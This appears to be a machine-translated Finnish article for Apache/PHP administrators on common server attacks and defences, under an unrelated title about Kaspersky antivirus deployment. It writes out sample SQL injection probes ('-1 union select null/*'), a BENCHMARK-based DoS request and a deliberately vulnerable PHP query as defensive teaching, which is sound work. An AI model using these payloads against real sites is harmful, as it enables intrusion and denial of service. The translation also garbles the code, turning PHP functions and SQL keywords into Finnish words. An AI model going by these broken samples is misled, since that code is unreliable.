Virustorjuntasuojauksen käyttöönotto Kaspersky Security Centerin kautta. Virustorjunnan määrittäminen Liian paljon aikaa

Tässä artikkelissa haluan kerätä tietyntyyppisiä hyökkäyksiä palvelimia vastaan ja keinoja suojata palvelinta hakkereilta. Turvallisuudesta on kirjoitettu paljon kirjoja ja artikkeleita. Tämän artikkelin painopiste on järjestelmänvalvojien perusvirheissä ja ratkaisuissa niiden poistamiseen. Tämän artikkelin lukemisen ja oman palvelimensa tarkistamisen jälkeen järjestelmänvalvoja ei myöskään voi nukkua rauhassa, hän voi vain sanoa, että läpäsin "ehdokasminimin".

Muista ylläpitäjien kolme sananlaskua,
Ei! parempi tulostaa ne ja ripustaa ne työpaikallesi silmiesi eteen:
"Turvallisuus on prosessi",
"Kun järjestelmänvalvojalla ei ole mitään tekemistä, hän on turvassa",
"Turvallisuus määritellään heikoimman lenkin mukaan"
Artikkeli on suunnattu *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) järjestelmänvalvojille ja palvelimien suojaamiseen etähyökkäyksiltä, muille ylläpitäjille toivon, että artikkeli antaa ajattelemisen aihetta.
Eri kirjoissa on erilaiset hakkerihyökkäysten luokitukset, esitän oman jakoni kahteen ehdolliseen luokkaan KAIKKI hyökkäykset, pura ne:

Hyökkäys palveluihin, jotka ovat haavoittuvia ja saatavilla Internetin kautta

Ymmärtääksesi jakoani, kuvittele, että on olemassa kuvitteellinen skripti, joka hyökkää Apachea etäyhteyden kautta porttiin 80, ja hyökkäyksen seurauksena Apache sammuu ja jäät ilman sivustoasi, koska kukaan ei anna verkkosivuja. Sendmail-postipalvelimellesi lähetettiin 1000 merkkiä lyhyen käyttäjätunnuksen sijaan parametrina VRFY:lle. Sendmail ei odottanut tämän tapahtuvan ja suljettiin jättämättä sinulle postia. Tämän ehdollisen luokan hyökkäysten yleinen merkitys on, että joitain sovellusten haavoittuvuuksia hyödynnetään. Ja on kolme tapaa -

polku1) sovellus kaatuu ja palvelu ei ole käytettävissä, DoS-tilanne;
polku 2) sovellus alkaa kaapata resursseja ja suorittaa ne käytettyään DoS:n;
polku3) sovellukselle syötetään shell-koodi ja hyökkääjän koodi suoritetaan;

Nämä ovat kaikki palveluun kohdistuvia hyökkäyksiä (kohta 1), ja niitä käsitellään vain yhdellä tavalla: järjestelmänvalvoja saa nopeasti tiedon kehittäjältä haavoittuvuuden olemassaolosta ja päivittää tämän ohjelman.

Hyökkäys kohtaan 2 on, kun jollain ohjelmointikielellä toteutettu dynaaminen palvelu sallii parametrien vastaanottamisen ja suorittaa ne tarkistamatta niitä. Esimerkiksi selainta käyttämällä hyökkääjä, joka indeksoi Apache-sivustoa, etsii haavoittuvuuksia itse sivustosta ja hyödyntää niitä, saa mitä haluaa. Tcl:llä kirjoitettuna IRC-palvelinkanavan moderointibotti vastaanottaa pyyntöjä käyttäjältä (uuden vitsin numero, sään näyttöpäivämäärä) ja hakkereilta, luoden uudelleen botin ohjelmakoodin työn (reverse engineering) ), muodostaa pyynnöt, joita botin kirjoittaja ei ottanut huomioon.

Kysy miten on? niin tarvitset ehdottomasti tämän artikkelin. Tavalla tai toisella, juuri alla kaikki maalataan.

Hyökkäys haavoittuvia palveluita ja itse palvelinta vastaan

Tähän osioon sisällytin kaikki hyökkäykset, joiden vaikutus kohdistuu järjestelmään ja palveluihin. Usein tällaiset hyökkäykset ovat mahdollisia ohjelman toteutuksen virheistä, kuten puskurin ylivuoto (puskurin ylivuoto). Lyhyesti sanottuna se näyttää tältä, vaikka huonosti kirjoitetussa ftp-palvelimessa on jono (puskuri) käyttäjätunnukselle tietylle määrälle merkkejä (esimerkiksi 10), ja tällainen ftp-palvelin vastaanottaa 100 merkkiä sairaalta. -Wisher, jos tällaista tilannetta ei ole tarkistetussa ftp-palvelinkoodissa, tapahtuu puskurin ylivuoto.

Joten mitä hyötyä paikallisesta puskurin ylivuotosta on hakkereille? Palautusosoite on mahdollista korvata haitallisella koodilla. Tämä mahdollistaa etänä mielivaltaisen koodin suorittamisen kohdejärjestelmässä, paikallisesti, jos ohjelma on käynnissä pääkäyttäjänä, se mahdollistaa järjestelmänvalvojan oikeuksien hankkimisen. Koodia, joka aiheuttaa puskurin ylivuodon ja suorittaa toimintoja hakkereille, kutsutaan shelliksi Shell-koodin kirjoittaminen ei ole helppo tehtävä, ja se vaatii hakkereilta kokoonpanokielen taitoa, mikä tarkoittaa ammattimaisuutta tällä alalla.

Suojaus hyökkäyksiltä haavoittuvia palveluita ja itse palvelinta vastaan

Päivittää. On tarpeen oppia päivittämään koko järjestelmä ja siksi pystyä siihen
"rakenna maailma ja ydin" *nixille, päivitä Linux-pakettijärjestelmän kautta ja napsauta Päivitä-painiketta Windows Updatessa lisensoidulle MS Windowsille. FreeBSD-järjestelmänvalvojien on voitava asentaa ohjelmistoja porttien avulla. Tällä tavalla purjehdit kehittäjien kanssa, et heitä vastaan.
MS Windows -järjestelmänvalvojien on totuttava MSI-jakelumuotoon ja käytettävä sitä useammin, mitä Microsoft suosittelee ja tukee vanhan paketin päivittämistä uuteen. Mitä tahansa teetkin palvelimellasi, kysy itseltäsi, onko tästä ohjelmasta olemassa uusi versio, kuinka helppoa sen päivittäminen on? Sinun on luotava ratkaisu, johon sinulla on täysi hallinta, kyllä, on projekteja, joissa on omat kehitystyönsä tai korjaustiedostonsa, mutta jos kehitystyösi edellyttävät tarvitsemiesi sovellusten jäädyttämistä tietyssä versiossa etkä voi asentaa korjauksia uuteen järjestelmään - sellainen ratkaisu EI kannata!

Teen tässä lyyrisen poikkeaman ja kerron kuinka minun piti murtaa itseni. Kun olet lukenut Internetissä artikkeleita, jotka alkavat yleensä näin, "lataa lähde ja laita se asenna". Mitä seuraavaksi? Miten asennat uuden version? Säilytetäänkö vanha versio, jotta voit tehdä (poistaa) asennuksen siihen? Ja uudessa mallissa asenna uudestaan? Nämä kysymykset kysyi ystäväni Dmitry Dubrovin, kun aloimme oppia FreeBSD:tä. Aloin ymmärtää, että hän oli oikeassa, ja ainakaan Freelle tämä polku ei sovi, ja kun en seurannut FreeBSD-kehittäjien polkua, tein asioita vain vaikeammaksi itselleni.

Nyt, kun FreeBSD on hallittu, pari komentoa lataa uusia lähteitä ilmaiselle ytimelle ja koko järjestelmälle, pari komentoa luo uusi maailma ja ydin, ja sitten järjestelmän portit ja sovellukset päivitetään, alat ymmärtää * nix -järjestelmien tehoa. On vaikea välittää sitä ylpeyttä, jota tunnet, kun päivität palvelimen FreeBSD:llä vanhasta haarasta nykyiseen, rakennat järjestelmän maailman uudelleen, kun järjestelmä kokoaa itsensä uusista lähteistä (näyttää siltä, että Munchausen veti itseään hiuksista) ja kaikkea joka toimi ennen päivitystä, toimii myös "ilman tiedostoa".

Kuten jo ymmärsit, sinun on tilattava tietoturvapostituslistat liiketoimintaasi tukevien ohjelmistojen kehittäjiltä ja päivitettävä säännöllisesti. Kaiken ja kaiken uudistaminen on täydennettävä ja saatettava raiteille.
Turvallisuuden viritys. Useimmat palvelimien käyttöjärjestelmät eivät ole oletuksena tarpeeksi konfiguroituja toimimaan Internetin ankarassa "kemiallisessa" ympäristössä. Jotta hakkerit "eivät huijaa" palvelimellasi, sinun on suoritettava suojaussäätö, nimittäin lue käyttöjärjestelmän valmistajan suositukset turvallisuudesta. *nix-järjestelmien järjestelmänvalvojat voivat soittaa miehelle turvallisuuteen ja kehittäjien neuvot luettuaan toteuttaa sadun. Mutta olipa käyttöjärjestelmä mikä tahansa, sinun on testattava huolellisesti palvelimen ja palveluiden toiminta turvasäädön jälkeen.
palomuuri. Määritetty palomuuri, jonka tarkastit henkilökohtaisesti nmap-porttitarkistimilla ja haavoittuvuustarkistilla. Jos näistä ohjelmista tulee tulos, ymmärrättekö kaikki, mistä on kyse? Kun määrität palomuuria, muista, että on olemassa tapoja ohittaa sen säännöt. Esimerkiksi palomuurilla suojattu lähiverkko on asettamalla pakettien pirstoutumisen estolipun, tietyissä tilanteissa on mahdollista päästä kohteeseen lähiverkossa. Tai yleinen järjestelmänvalvojan virhe, liiallinen luottamus oman palvelimen lähteviin paketteihin.
Kuvittele todellinen tilanne, vihollisen koodi yrittää muodostaa yhteyden hakkerin omistajan isäntään, ja sinulla on palomuurissa sääntö "minustani on kaikki sallittu Internetiin". Kun kirjoitat palomuurisääntöjä, sinun on ymmärrettävä täysin kokonaiskuva palveluidesi verkkoviestinnästä heidän ja etäasiakkaiden välillä.
Tunkeutumisen tunnistusjärjestelmä. Palomuuri voidaan kuvitella kiviseinäksi lähellä ritarin linnaa. Kerran pystytetty ja istua sisällä - kuiva ja mukava. Mutta entä jos joku jo testaa seinien lujuutta tykistä? Ehkä sinun täytyy jo katsoa ulos linnasta ja kasata joku? Jotta tiedät, mitä linnan seinien takana, sen ulkopuolella tapahtuu, tarvitset tunkeutumisen havaitsemisjärjestelmän (IDS) palvelimella. Jos sinulla on tällainen järjestelmä, joka perustuu haluamaasi pakettiin, niin jos joku alkaa ampua nmap-aseesta, olet tietoinen ja hyökkääjä on myös tietoinen "mitä tiedät".
Epätyypillisten tilanteiden analyysi. Useissa järjestelmän lokeissa merkinnät "error: not open file /etc/passwd" tai "pääsy estetty" vilkkuvat usein. Nämä ovat pieniä kelloja, jotka soivat väärin määritetystä sovelluksesta, joka ei voi lukea jotain, jostain, tai ehkä se ei ole kello, vaan hälytys, joka hälyttää hakkereista, joka on puolivälissä.
Joka tapauksessa järjestelmänvalvojan tulee olla tietoinen sellaisista asioista. Järjestelmänvalvojan työn helpottamiseksi on luotu ohjelmia, jotka analysoivat lokit mielenkiintoisten lauseiden esiintymisen varalta ja lähettävät raportin järjestelmänvalvojalle postitse. Älä halveksi tällaista mahdollisuutta, sellaiset ohjelmat ovat verrattavissa vartijoihin, jotka tarkistavat luotetulla polulla, mutta käyttäytyvätkö kaikki niin kuin on määrätty?
Poista ohjelmistoversiot. Poista bannerit palveluistasi. Ei, eivät ne bannerit, joita näytät sivustollasi, vaan ne rivit, jotka ohjelmasi antavat tervehdyksenä yhteyden muodostamisen yhteydessä tai virhetulosteessa. Sinun ei tarvitse loistaa ohjelmiesi versioilla, hakkerit etsivät Internetistä saatavilla olevia ohjelmia, jotka hyödyntävät tätä tai toista haavoittuvuutta (hyökkää - exploit) versioittain.
Tässä ei ole yhtä ainoaa ratkaisua, jos esimerkiksi asennat tietyn ohjelman porteista, älä kirjoita make install clean, joten ilman sinua kaikki ladataan, käännetään ja asennetaan. Parempi noutaa; tehdä ote; sitten mene tiedostojen alihakemistoon ja siellä voit korjata ohjelman version lähteissä tai välittää sen toiseksi ja sitten vain tehdä asennuksen puhtaaksi.

Apache on erittäin informatiivinen epäpaikallinen ja silti loistavat järjestelmäversioiden, PHP, Perl, OpenSSL kanssa. Häpeä poistetaan käytöstä määrittämällä käskyt httpd.conf ServerSignature Off ServerTokens Prod. Internetistä löydät apua bannerien korvaamiseen millä tahansa ohjelmalla. Tavoite on sama - riistää hyökkääjältä arvokasta tietoa. Kun tarkastelet luetteloasi Internetistä saatavilla olevista palveluistasi, kysy itseltäsi, antaako se liikaa tietoa itsestään ja tallentamistaan tiedoista.

Esimerkiksi DNS-palvelimen sidos voi sallia "vyöhykesiirron" ja tietokoneesi IP- ja verkkotunnusten kanssa ovat kaikkien saatavilla, mikä on huonoa. Tarkista palvelimesi eri skannereilla ja lue niiden tulokset huolellisesti. Kun vaihdat ohjelmabanneria, suosittelen, että kirjoitat ei satunnaista tekstiä, vaan varoituksen vastuusta ja siitä, että toimet kirjataan. Koska oli tapauksia, joissa hakkeri vapautettiin oikeussalissa, koska hakkeroidulla FTP-palvelimella oli kirjoitus "Tervetuloa! Tervetuloa!".
Vähimmäisvaatimussääntö. Minimoi Internetin käytettävissä olevat palvelut. Poista käytöstä se, mitä et tarvitse, koska et voi hakkeroida sitä, mikä on poistettu käytöstä. Yleinen virhe, esimerkiksi kun MySQL-palvelin, joka on yhdistetty samassa koneessa olevaan Apacheen, on määritetty olemaan etäkäytettävissä sen vakioportin 3306 kautta. Miksi? Anna komento netstat -na | grep KUULU ja anna itsellesi vastaus: tiedätkö mitkä ohjelmat käyttävät mitä käyttöliittymää ja mitä porttia? Oletko hallinnassasi? No jos niin.
Useita vahvoja ja erilaisia salasanoja. Usein hakkerointivideoissa tai hakkereiden hakkerointitarinoissa vilkkuu lause "on hyvä, että järjestelmänvalvojalla oli yksi salasana hallintapaneelille, joka nousi myös ssh:hen ja ftp:hen". Toivottavasti tämä ei koske sinua. Tästä johtuu sääntö: eri palveluiden salasanojen on oltava erilaisia ja vähintään 16 merkkiä pitkiä. Kirjoita ne paperille, jos pelkäät unohtaa (tässä paikassa tietoturvaasiantuntijat tappavat minut), mutta tämä on parempi kuin etähyökkääjä purkaa salasanasi muutamassa minuutissa, koska salasana ja samankaltaisuus sanakirjasanan kanssa mahdollistivat sen.
Erilaiset salasanat eri palveluille on helppo tehdä, jos palvelut eivät valtuuta järjestelmäkäyttäjiksi /etc/passwd-tietokannassa, vaan virtuaalisina omissa taso- tai DBMS-tietokantoissaan. Älä tallenna salasanoja palvelimille Password.txt-tiedostoon kaikille resursseille, joihin sinulla järjestelmänvalvojana on pääsy.
Rajoitus. Kaikkien palvelimella olevien palveluiden on toimittava eri rajoitetuilta tileiltä (tililtä), eikä niitä koskaan suoritettava päätililtä. Usko minua, jos he pääsevät eskaloitumaan rajoitetusta tilistä pääkäyttäjän tilaan (uid=0, gid=0), pelastut päivitetyn järjestelmäsi tunnettujen aukkojen puuttuessa.
Muuten, monet järjestelmänvalvojat unohtavat sellaisen asian, miksi esimerkiksi Apachea ja MySQL:ää käyttävillä tileillä pitäisi olla pääsy shelliin! Loppujen lopuksi tämä voidaan poistaa käytöstä ja määrittää kuoren sijaan / bin / false. No, rehellisesti, tarkista tililtäsi raportointipalvelimesi ohjelmia ja kerro, jos olen väärässä. Rajoita SQL-tietokantojesi tilit vaadittuihin vähimmäisoikeuksiin. Älä anna FILE-oikeuksia, kun vain SELECT kutsutaan.
Kaikki vankilaan! Opi työskentelemään hiekkalaatikoiden (hiekkalaatikko) tai vankiloiden (vankiloissa) kanssa ja ajamaan sovelluksia näissä eristetyissä huoneissa. Tämä vaikeuttaa koko palvelimen hakkerointia. Jos käytät virtualisointia, voit levittää palveluita eri vieraskäyttöjärjestelmiin.
Kerrostettu puolustus. Jotain on mahdollista kieltää monella tapaa eri paikoissa - tee se. ÄLÄ KOSKAAN ajattele - kielsin sen täällä, siellä kieltämästä ylimääräistä.

Lue lisää hyökkäyksistä haavoittuvia palveluita ja itse palvelinta vastaan.

DoS-hyökkäys (Denial of Service) - hyökkäys, jonka tavoitteena on tappaa kaikki rajoitetut palvelinresurssit (Internet-kanava, RAM, prosessori jne. jne.), jotta palvelin ei voi palvella laillisia käyttäjiä. Kuvittele kuvaannollisesti puhuen, että tunkeilija soitti sinulle kotiin ja oli hiljaa puhelimessa, ja tätä jatkui koko illan. Olit kyllästynyt tähän kaikkeen ja sammutit puhelimen, ja aamulla huomasit, että sinulla oli pomoltasi puuttunut tärkeä puhelu. Tässä on analogia oikea elämä DoS-hyökkäykset.
Todellisessa elämässä DoS näyttää usein tältä, ohjelman vian vuoksi prosessorin käyttö hyppää ja pysyy 100%:ssa pitkään, ja hyökkääjä käyttää ajoittain hyväkseen tätä ohjelman aukkoa. Huonosti kirjoitetun sovelluksen RAM-muisti voi loppua. Tai "postipommi" voimakkaasti pakatun tiedoston muodossa arkistossa, jossa on monta merkkiä [välilyönti], jonka virustorjunta purkaa tarkastaakseen ja purettu valtava tiedosto täyttää palvelimen kiintolevyosion ja/ja aiheuttaa palvelimen uudelleenkäynnistyksen.

DoS-hyökkäyssuojaus:
- DoS-hyökkäystä varten manipuloidun ohjelman päivittäminen
- Aseta resurssikiintiöt tilille, jolla tämä ohjelma on käynnissä. *nix-järjestelmien avulla voit säätää prosessorin käytön prosenttiosuutta, RAM-muistia, synnytettyjen prosessien määrää, avoimia tiedostoja jne. ja niin edelleen.
- Määritä kirjautuminen ohjelmaan ja yritä löytää hyökkääjä-nukkenäyttelijä ja estää hänet palomuurista.
- Asenna ohjelma kehittäjän, gurun, Internetin artikkelien mukaan, jos joudut tällaiseen tilanteeseen.
DDoS (sama DoS, mutta sinua hyökkäävät useat zombie-tietokoneet, joita johtavat
hyökkääjä). DDoS on tuhoisa, ja niitä käyttävät vain ne vandaalit, joilla on zombie-koneita ja jotka vaativat rahaa hyökkäyksen pysäyttämiseksi tai yrityksesi vahingoittamiseksi, jotta käyttäjät menevät kilpailijan luo ilman palvelintasi. DDoS-hyökkäyksiä eivät käytä hakkerit, joiden tavoitteena on älyllisesti hakkeroida palvelin, kyllä, kyllä, palvelimesi on "mysteeri", jonka he haluavat "ratkaista".
Kuinka suojautua DDoS:lta? Jos luotat omiin vahvuuksiisi ja keinoihisi, niin skriptien työn automatisoimalla voit kalastaa IP-osoitteita eri lokeista ja syöttää ne kielteisiin palomuurisääntöihin. Niinpä esimerkiksi artikkelin "Onko DDoS:ssa elämää" kirjoittaja useita artikkeleita sen määrittämisestä DDoS-vaurioiden minimoimiseksi.

Suojaus DDoS-hyökkäyksiä vastaan:
- Jos DDoS on suunnattu sovellukseen, yritä löytää lokeista ero hyökkääjien ja laillisten käyttäjien välillä ja kirjoita se palomuurisääntöihin skriptillä automatisoimalla.
- Jos DDoS on suunnattu järjestelmään (esimerkiksi hyökkäys ICMP-protokollan yli), lisää se skriptillä automatisoimalla palomuurisääntöihin in deny
- Aseta resurssikiintiöt tilille, jolla tämä ohjelma on käynnissä. * nix-järjestelmien avulla voit määrittää prosessorin käytön prosenttiosuuden, RAM-muistin, synnytettyjen prosessien määrän, avoimet tiedostot jne.
- Asenna ohjelma kehittäjän, gurun neuvojen mukaisesti Internetin artikkeleiden mukaan, jos joudut tällaiseen tilanteeseen
- Ota yhteyttä palveluntarjoajaasi saadaksesi apua kaikin mahdollisin tavoin. Kirjoita valitus osoitteeseen [sähköposti suojattu] isäntä_of_networks_from_attack.domain. Tämä auttaa osittain tuhoamaan hyökkääjän verkon, anna hänen kärsiä vahinkoa, se maksaa hänelle rahaa. Koe moraalinen tyydytys.
- Katso Apachen mod_security, se on loistava työkalu, joka auttaa sinua joissakin tilanteissa.
Bruteforce salasanahyökkäys. Tässä ohjelmien aukot eivät ole syyllisiä, ne vain valitsevat karkeasti parin kirjautumistunnusta / salasanaa. Niiden, jotka poistuivat palvelimelta ssh-asetuksena, mutta unohtivat rajoittaa pääsyä ssh:n kautta tietyiltä IP-osoitteilta ja tietyillä sisäänkirjautumisilla (direktiivi kohdassa ssh_config AllowUser), on täytynyt nähdä lokeissa yrityksiä pakottaa salasana mash:password_machine.
Bruteforce salasanasuojaus:
- Rajoita epäonnistuneiden kirjautumis-/salasanayritysten määrää
- Jos sovellus sallii, pidennä aikaa ennen uutta kirjautumis-/salasanayritystä.
- Jos kapea joukko ihmisiä työskentelee sovelluksen kanssa, luo tällainen sääntö ja rajoita se

Hyökkäys palvelun dynaamisen sisällön kautta

Tämän tyyppinen hyökkäys tapahtuu usein joukossa Apache + (PHP | PERL) + (MySQL | PostgreSQL) *nix-maailmassa ja IIS + ASP + Microsoft SQL Server MS Windows -maailmassa käyttämällä yksinkertaista selainta, mutta tämä on vain erikoistapaus, jota käytetään vain yleisemmin verkon suosion vuoksi. Tässä paketissa ohjelmointikielet ovat ASP, PHP, Perl, SQL, joten hakkerit käyttävät niitä usein tuhoavien suunnitelmiensa laatimiseen.

MUTTA tärkeintä on ymmärtää, että tällaiset nivelsiteet palvelu + dynaaminen sisältö niiden päällä Ohjelmointikieliä on monia, ja siksi ne kaikki ovat hakkereiden aseessa. Tässä on esimerkiksi epätäydellinen luettelo:

Web-palvelin + CGI-skriptit
Vanha linkki, joka ei ole enää käytössä - Apache + PHF (eli P H F) -skriptit
IIS + ColdFusion-sovelluspalvelin
SSI-mekanismi (sisältää palvelinpuolen)

Seuraavaksi puhumme enimmäkseen verkkohakkeroista, mutta älä unohda, että kaikki alla kuvattu pätee muihin palvelu + dynaamisiin sisältöpaketteihin. Sanat ovat erilaisia, mutta olemus on sama. Nykyään hakkerit hyökkäävät verkkoon selaimella, huomenna R-asiakkaalla palvelua Z vastaan. Web-palvelimesta, joka on yhdistetty tietokantoihin ja lukuisiin ohjelmointikieliin, on tullut alusta tällaisille hyökkäyksille.

Kaikkien tällaisten hyökkäysten tarkoitus on yrittää tutkia sivustoa selaimella löytääkseen virheitä skripteistä, jotka palvelevat sivuston dynaamista sisältöä (sisältöä).

Tästä päätelmä - sivuston hakkerointi verkkohyökkäyksen kautta, jolla on vain staattisia html-sivuja, jotka viittaavat vain toisiinsa, on MAHDOLTONTA. Hyökkäykset Web-sivustosi kautta syntyivät, kun ihmiset halusivat enemmän interaktiivisuutta ja lisäsivät sitä ohjelmointikielten ja tietokantojen kautta.

Sivustolla surffaavat hakkerit kiinnittävät erityistä huomiota komentosarjoihin, jotka välittävät minkä tahansa parametrin. Mutta entä jos komentosarjan tekijä ei tarkista, mikä tarkalleen on välitetty parametrin arvona?

Yleisiä ratkaisuja järjestelmänvalvojalle palvelun dynaamiseen sisältöön kohdistuvista hyökkäyksistä (verkkosivusto erikoistapauksena)

Päivittää. Olemme jo puhuneet tästä, mutta jos käytät kolmannen osapuolen kehitystä (foorumien, gallerioiden, keskustelujen moottorit jne.), saat raportteja haavoittuvuuksista ja korjausaukoista. Hakkereiden mielipide on, että jos portaali toimii rahoituksen ja sen liikevaihdon kanssa, niin tällaisessa portaalissa ei ole toivottavaa, että siinä on jonkun muun, paitsi heidän oman kehitystään. Tietenkin ymmärretään, että sivuston omien moottoreiden kehittämisen ovat kirjoittaneet koodaajat, jotka osaavat ohjelmoida turvallisesti ja joilla on käsitys Internetin uhista.
Ole epästandardi. Monissa hakkereiden apuohjelmissa, haavoittuvuustietokannassa, foorumi/, galleria/, kuvat/ polut vilkkuvat usein. Erittäin mukavasti! Tunne järjestelmänvalvoja, puolet heistä ajaa ja sylkee sivustoasi, kun sivustosi ei ole osoitteessa /usr/www ja järjestelmänvalvojasi ei ole site.com/admin. Tärkeintä on, että jos et ole tavallinen, tämä on ylimääräinen puoli hakkerin pyörissä, joka hyökkää sivustollesi. Hänen on lisättävä / korjattava manuaaliseen tietokantaan / komentosarjaan. Mutta onko hakkeri aina kykenevä tai halukas tekemään sen? Nuoret hakkerit "käsikirjoituslapset" pelkäävät varmasti pois. Esimerkiksi PHP-tietoturvavinkkejä
# Tee PHP-koodi näyttämään muun tyyppiseltä koodilta
AddType application/x-httpd-php .asp .py .pl
# Tee PHP-koodi näyttämään tuntemattomilta koodeilta
AddType-sovellus/x-httpd-php .bop .foo .133t
# Tee PHP-koodi näyttämään html:ltä
AddType-sovellus/x-httpd-php .html .htm

Tällä PHP:n suojauksella piilottamisen kautta on muutama haittapuoli pienellä hinnalla. Hakkerit itse, kuvaillessaan hakkeroitaan, kirjoittavat, että he lataavat saman ohjelmiston, joka sijaitsee palvelimellasi, kehittäjän sivustolta ja katsovat, minkä oletustaulukkonimien / polkujen / tämä tai tuo moottori toimii. Epästandardin yleinen merkitys on viivyttää hakkerointiprosessia, jotta hakkeri ei saa "blitzkriegiä", ja mitä enemmän hän vetää, sitä todennäköisemmin se havaitaan.
Poista sivustolta moottoreiden ja komentosarjojen versiot. Tämä on arvokasta tietoa, joka hyökkääjältä tulisi riistää, koska hän tietää, minkä version hän etsii valmiita ratkaisuja hakkerointiin. Tee siitä niin, että komentosarjasi eivät näytä virheitä virheissä hyödyllistä tietoa, kuten: polku komentosarjaan, jossa virhe tapahtui ("polun paljastamisongelma") ja itse virheen tulos.
Harkitse .htaccessin tarvetta. .htaccess-tiedostojen läsnäolo tarkoittaa, että voit ohittaa Apachen pääasetuksissa määritetyt asetukset, usko minua, hakkerit tekevät juuri niin. Jos poistat .htaccess:n käytön "AllowOverride None" -direktiivillä, saat Apachen suorituskykyedun, koska se ei käy läpi kaikkia verkkosivun polulla olevia hakemistoja jokaisessa pyynnössä ja lisää Apache-verkkopalvelin.

Lisätietoja dynaamiseen sisältöön kohdistuvista hyökkäyksistä (verkkosivusto erikoistapauksena)

XSS (Cross Site Scripting).
Sivustojen välistä komentosarjaa kutsutaan XSS:ksi, ei CSS:ksi, koska CSS on varhainen lyhenne sanoista "Cascading Style Sheets". XSS-hyökkäykset eivät ole suunnattu palvelinta vastaan, vaan palvelimen käyttäjiä vastaan. Mutta järjestelmänvalvojan ei tarvitse iloita! XSS-hyökkäys näyttää tältä, sivustolla on muokattavia kenttiä verkkosivulla tai komentosarjaparametreja, joita ei suodateta lomakkeen rakentamisessa<, >, javascript.
Hakkeri lisää muokattaviin kenttiin koodia asiakaspuolen ohjelmointikielellä, yleensä Javalla ja VBScriptillä, ja tästä koodista tulee osa HTML-sivua. Kun käyttäjä vierailee tällaisella sivulla, hänen selaimensa jäsentää sivun ja suorittaa tämän koodin.
Mitä hakkerit tekevät XSS:llä?
- Evästeiden varkaus (evästeet, pullat) - nämä tekstitiedostot tallentavat tietoja, jotka palvelin "laittaa" käyttäjälle tämän myöhempää tunnistamista varten. Jos esimerkissä luot test.html-tiedoston tällä sisällöllä (kirjoitat sen itse), selaimessa suoritettuna se tulostaa XSS:n.
  Hyvä järjestelmänvalvoja, sivustolla käydessäni tapahtui virhe
  auta
  Mutta voit kirjoittaa käsikirjoituksen Javalla ja vakavammin. Tyypillisesti tällaiset skriptit kirjoitetaan järjestelmänvalvojan verkkosähköpostiin, ja ne yrittävät saada hänet lukemaan viestin saadakseen evästeet sosiaalisen manipuloinnin avulla.
  
  Jos evästeissä ei ole linkkiä IP-osoitteeseen ja lisäturvatoimiin, ne korvaavat evästeensä järjestelmänvalvojan evästeillä ja yrittävät päästä hallintapaneeliin, joka ei tarkista käyttäjätunnusta ja salasanaa ja tunnistaa ihmiset vain evästeiden perusteella.
- Sivuston deface (deface - sivuston aloitussivun korvaaminen, useimmiten index.html)
- Etäkäyttäjän troijalainen. Käyttäjien selaimiin valitaan tuoreet hyväksikäytöt, ja kun he tulevat haavoittuville sivuille, tietokone yritetään saastuttaa troijalaisella. Jos käyttäjällä on virustorjunta, johon on asennettu tuoreet tietokannat, hän ilmoittaa troijalaisen ilmestymisen järjestelmään. Ja sivustosi putoaa käyttäjän silmiin, ehkä hän ei tule luoksesi uudelleen.
- DoS. Suurella kävijämäärällä skripti pyytää lisäksi lisää muita sivuja palvelimeltasi tai toiselta, jollain voi olla DoS.
Ratkaisu ongelmaan:
- Voit estää html-tunnisteiden kirjoittamisen tietokantaan syöttökentistä käyttämällä rakenteita, kuten htmlspecialchars for PHP, joka korvaa< на <, >>, & kohtaan & ja niin edelleen
  Esimerkki,
  $kommentti = htmlerikoismerkit($kommentti, ENT_QUOTES);
  $query = "lisää vieraskirjaan
  (nimi, sijainti, sähköpostiosoite, URL-osoite, kommentti) arvot
  ("$nimi", "$sijainti", "$sähköposti", "$url", "$kommentti")";
  mysql_query($kysely) tai die(mysql_error());
- Tarkista ja suodata komentosarjoissasi kaikki parametrit, jotka käyttäjä syöttää ja jotka välitetään komentosarjalle osoitepalkin kautta. Opi käyttämään säännöllisiä lausekkeita oikein saapuvan tiedon jäsentämiseen. Löydä ohjelmointikielellesi materiaalia, joka opettaa sinua koodaamaan turvallisesti.
- Jos haluat käyttää evästetekniikkaa sivustollasi, lue evästeiden suojauskäytännöt. Rajoita heidän toimintaansa ajallisesti ja IP-osoitteiden mukaan.
- Järjestelmänvalvojana ole valppaana, kun sosiaalinen manipulointi huijaa sinua. Älä unohda henkilökohtaisten tietokoneiden turvallisuutta asiakastietokoneesi takana.
SQL-injektio. SQL-injektio.
Tämä sairaus tarkoittaa, että skriptissä näkyvään SQL-kyselyyn korvataan tarkistamaton parametri. Hakkeri löytää SQL-injektiosta kärsivät skriptit yksinkertaisella tavalla, parametrin arvoon syötetään site.com/view.php?id=1" tai numeerista parametria muutetaan kuten tämä site.com/view.php? id=2-1.
Jos korvattu lainaus aiheuttaa "virheen" (paljon viestejä, että sellaista ja sellaista pyyntöä ei suoriteta sellaisessa ja sellaisessa skriptissä tällaista polkua pitkin), niin tällainen komentosarja on ehdokas pumppaamaan sitä eteenpäin. Usein hyökkääjät käyttävät Google-hakkerointia ja kysyvät hakukoneelta jotain tällaista "sivusto: www.victim.ru Varoitus". Google-hakukone palauttaa sivustollesi virheellisiä komentosarjoja, jotka ovat niin vanhoja, että Google-hämähäkki on indeksoinut ne pitkään. .

Koodi, joka ei tarkista arvoa ja kärsii SQL-injektiosta
$id = $_PYYNTÖ["id"];
$result = mysql_query("SELECT otsikko, teksti, päivämääräuutiset, tekijä FROM `uutiset` WHERE `id`="$id"");

Kuvittele nyt, että numeron sijasta sinut korvataan "-1 union select null/*" (ilman lainausmerkkejä) ja sitten kyselysi muuttuu
SELECT otsikko, teksti, päivämääräuutiset, kirjoittaja FROM `uutiset` WHERE `id`="-1 union select null/*"

Toisin sanoen hakkeri haluaa, että hänen pyyntönsä toteutetaan pyyntösi lisäksi yhdistettynä sinun pyyntöösi ammattiliittodirektiivin mukaisesti. Ja sitten hakkeri yrittää tehdä muita kyselyitä, ja SQL-kielen teho huomioon ottaen tämä ei lupaa hyvää järjestelmänvalvojalle. Defacesta (deface - sivuston aloitussivun korvaaminen) pääkäyttäjän oikeuksien hankkimiseen palvelimellesi. Hakkeri voi suorittaa DoS-hyökkäyksen myös SQL-injektion ansiosta: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(current_date))) pari tällaista pyyntöä ja palvelin on 100 % suorittimella kuormittaa pitkään.

SQL-injektion suojaus:
- Hyödynnä laajasti SQL Server -ominaisuuksia, kuten näkymiä ja tallennettuja menettelyjä. Tämä rajoittaa luvatonta pääsyä tietokantaan.
